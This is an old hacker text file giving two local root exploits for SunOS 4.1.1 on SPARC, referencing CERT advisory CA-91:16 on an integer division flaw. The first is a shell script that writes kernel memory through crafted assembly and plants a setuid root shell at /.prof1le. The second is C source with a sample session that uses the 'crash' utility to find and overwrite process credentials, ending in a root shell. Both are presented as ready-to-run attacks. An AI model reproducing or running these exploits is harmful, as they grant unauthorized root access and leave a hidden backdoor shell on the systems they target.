**************************************************************************
   HACK: Exploit floating point problems in SunOS 4.1.1
   CERT: CA-91:16.SunOS.SPARC.Integer_Division.vulnerability 09/18/91
 System: Sun OS 4.1.1 (? 4.1.2)
**************************************************************************

There are two hacks here:

Hack #1:

#-------------------------------------------------
#!/bin/sh

PID=$$
TMPDIR=/tmp/.tmp$PID
SUIDSH=/.prof1le

mkdir $TMPDIR
cd $TMPDIR

cat > mulc.c <<EOF
main(argc,argv) char *argv[];{
    wrmem(strtol(argv[1],0,0), strtol(argv[2],0,0));
}
EOF
cat > muls.s <<EOF
.globl _wrmem
 
_wrmem: mov     %o0, %g2
        mov     %o1, %g3
        save    %sp, -0x40, %sp
        save    %sp, -0x40, %sp
        save    %sp, -0x40, %sp
        save    %sp, -0x40, %sp
        save    %sp, -0x40, %sp
        save    %sp, -0x40, %sp
        mov     %g2, %sp
        umul    %g3, 1, %l0
EOF
cc -o mul mulc.c muls.s -ldl
 

TMPFILE=$TMPDIR/PROCP$$

# Find proc pointer.
cat <<EOF | dc | tr 'A-Z' 'a-z' >$TMPFILE
16o 16i
4C `/etc/pstat -u $$ | grep procp | cut -f2 | tr 'a-z' 'A-Z'` + p
EOF
read PROCP <$TMPFILE
SADR=`nm /vmunix | grep ' intstack' |cut -d' ' -f1`
./mul 0x${SADR} 0x10000
./mul 0x${PROCP} 0x${SADR}
cp /bin/sh $SUIDSH; chmod 4755 $SUIDSH  
echo -n "Id = "
whoami
( sleep 5; rm -rf $TMPDIR ) &
cp /bin/sh $SUIDSH; chmod 4755 $SUIDSH

Hack #2: More Complex


I have seen variations on this. This has you get the credentials address 
by running "crash".

This is again on 4.1.1 and 4.1.2

Here is the dialogue and the source for sparc.c follows.

Dialog for sparc.c-----------------------------------
cc sparc.c -o sparc  
Fire up sparc in one window.
Then fire up crash in another window.

Do a "p" in crash, and look for the sparc
slot number on the left.

Then do a p -f <slot_number>

poke the address specified into the prompt for a 
hex address from sparc. 

Voila!!! you get a shell.

Here is a sample run----
First login to the target machine
and run  the guy (at least once you get
the source over and compiled).

./sparc
enter address in hex


Then in another window run crash and
do a "p" 
look for sparc and the slot number associated with it 
It'll look sumpn like this.
81 s  4360  4341  4360   130  28   2 ff026150 sparc          swapped pagi

> p -f 81
PROC TABLE SIZE = 138
SLOT ST PID   PPID  PGRP   UID PRI CPU   EVENT     NAME        FLAGS
  81 s  4360  4341  4360   130  28   2 ff026150 sparc          swapped pagi
        time: 127, slptime: 127, nice: 20, exit 0
        usrpri: 50, cpticks: 0, pctcpu: 0
        sig: 0, cursig: 0, suid: 130, sgid: 84
        sigmask: 0, sigignore: 0, sigcatch: 0
        tsize: 2, dsize: 4, ssize: 2, rssize: 0, maxrss: 524287, swrss: 4
        link: f811d8a0  rlink: f811d8a0 nxt: f81f3764   prev: f81f49b4
        parent: f81f4de4        child: 0
        older sibling: 0        younger sibling: 0
        tracer: 0       idhash: 0       swlocks: 0
        nxt: 11
        timer interval: 0 secs 0 usecs timer value: 0 secs 0 usecs
        address space: ff0b4a58
        segu ptr: f831b000 stack: f831df58 uarea: f831e000
        number threads: 1
        credentials (at ff110170):
        ref: 42
        uid: 130        gid: 84 real uid: 130   real gid: 84
        auid: 65534     audit success: 0        audit failure: 0
        groups:  84   16    5   10   -1   -1   -1   -1 
                 -1   -1   -1   -1   -1   -1   -1   -1 
        security: lvl 0
        categories:  0   0   0   0   0   0   0   0 
                     0   0   0   0   0   0   0   0 


Now poke the hex address of the credentials line above into the prompt 
for the hex address.

$ ./sparc
enter address in hex
ff110170
address is 0xff110150
nic: ${PWD} (${USER}) $ id
uid=0(root) gid=0(wheel) groups=84(lgnc),16(cando),5(operator),10(staff)
nic: ${PWD} (${USER}) $ 

------------------------------------------------------------------
Here is the source for sparc.c


#include <stdio.h>

unsigned long addr;
unsigned long *pp;

char buf[BUFSIZ];

main(argc, argv)
int argc;
char **argv;
{

        printf("enter address in hex\n");
        gets(buf);
        sscanf(buf, "%x", &addr);
        addr -= 32;

        pp = (unsigned long *) addr;
        printf("address is 0x%0.8x\n", addr);

        if (fork() == 0) {
                asm("   sethi   %hi(_addr), %i4");
                asm("   ld      [%i4+%lo(_addr)], %i4");
                asm("   nop");
                asm("   mov     %i4, %sp");
                asm("   udiv    %i2, %i7, %i2");
                asm("   nop");
                exit(0);
        }
        else {
                wait((int *) 0);
                setreuid(-1, 0);
                setregid(-1, 0);
                system("/bin/sh");
                exit(0);
        }

}